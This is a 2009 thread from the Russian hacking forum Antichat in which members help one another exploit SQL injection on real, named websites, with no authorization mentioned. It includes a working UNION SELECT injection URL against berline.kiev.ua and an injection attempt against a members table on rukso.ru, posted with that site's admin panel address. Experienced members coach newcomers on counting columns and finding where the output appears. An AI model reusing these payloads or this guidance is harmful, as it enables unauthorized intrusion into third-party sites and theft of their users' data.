 |
|

01.07.2009, 02:27
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
Сообщение от .:[melkiy]:.
Скуля?
Код:
http://www.zhytomyr.ukrtelecom.ua/offers/webcams?id=61
нет
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|

01.07.2009, 08:04
|
|
Познающий
Регистрация: 26.04.2008
Сообщений: 31
С нами:
9495721
Репутация:
53
|
|
Народ. Помогите раскрутить скулю.
Код HTML:
http://www.berline.kiev.ua/?id=5
делаю запрос +union+select+1 - выводит ошибку бла-бла-бла different number of columns.
Прочитал про нее в большом FAQе jokester'a, но всеравно как-то "широко глаза" на этот трабл не открыло.
зы Если не трудно, то можно показать по подробнее на данном примере как добиться вывода запроса.
|
|
|

01.07.2009, 08:17
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
Сообщение от pelligrim
Народ. Помогите раскрутить скулю.
Код HTML:
http://www.berline.kiev.ua/?id=5
делаю запрос +union+select+1 - выводит ошибку бла-бла-бла different number of columns.
Прочитал про нее в большом FAQе jokester'a, но всеравно как-то "широко глаза" на этот трабл не открыло.
зы Если не трудно, то можно показать по подробнее на данном примере как добиться вывода запроса.
http://www.berline.kiev.ua/?id=-1+union+select+version()--+
там 1 колонка, вывод в тайтле, смотри внимательней...
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|

01.07.2009, 12:51
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
http://forum.antichat.ru/threadnav46016-782-10.html
 так ни кто и не ответит да??
|
|
|

01.07.2009, 12:58
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами:
10226672
Репутация:
441
|
|
Сообщение от HAXTA4OK
http://forum.antichat.ru/threadnav46016-782-10.html
 так ни кто и не ответит да??
В чём проблема использовать уже готовый сплойт? зачем тебе эта прога? ты вручную собрался перебирать?
|
|
|

01.07.2009, 14:40
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
смысл не в сплоите а в том почему у меня так же не получается произвести SQL
и главный смысл мне понять как в коде найти SQL (явный код я знаю как там найти а тут не догодался бы) вот и пытался сделать так же ..НО борода
P.S. про сплоит речи не было
Последний раз редактировалось HAXTA4OK; 01.07.2009 в 14:45..
|
|
|

01.07.2009, 15:26
|
|
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами:
9362947
Репутация:
1196
|
|
>>код я знаю как там найти
сотсавь регулярку и парсь.
|
|
|

01.07.2009, 15:52
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от HAXTA4OK
смысл не в сплоите а в том почему у меня так же не получается произвести SQL
и главный смысл мне понять как в коде найти SQL (явный код я знаю как там найти а тут не догодался бы) вот и пытался сделать так же ..НО борода
P.S. про сплоит речи не было
Баг будет работать при register_globals=ON
Ну и разумеется если версию не пропатчили. Тот кусок кода который привёл ты не даёт полной картины. Фильтры там стоят вообще в другом файле, самого запроса у тебя тоже нет. Какого совета ты хочешь?
Перичитай статью Электа, посмотри ещё раз видио, если ты имея на руках сорцы не видишь по коду есть скуль или нет, то наверное нужно браться за то что попроще, а не задавать вопросы на которые нет ответов.
Это из серии "я подставил кавычку и у меня ошибка, как мне взломать сайт".
|
|
|

01.07.2009, 17:30
|
|
Новичок
Регистрация: 05.07.2008
Сообщений: 16
С нами:
9395645
Репутация:
7
|
|
Народ вот нашел уязвимость,
http://www.rukso.ru/news/own/999190'+and+1=2+union+select+1,1,1,4,5,6,1+from+_m embers+--+
Но не могу подобрать колонки, можно отсюда чтонить выжать?
http://www.rukso.ru/admin/ - админка соответственно
|
|
|

01.07.2009, 18:36
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
Сообщение от softrix
Народ вот нашел уязвимость,
http://www.rukso.ru/news/own/999190'+and+1=2+union+select+1,1,1,4,5,6,1+from+_m embers+--+
Но не могу подобрать колонки, можно отсюда чтонить выжать?
http://www.rukso.ru/admin/ - админка соответственно
Table 'rukso._members' doesn't exist
Ты бы сначала таблицу правильно подобрал...
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|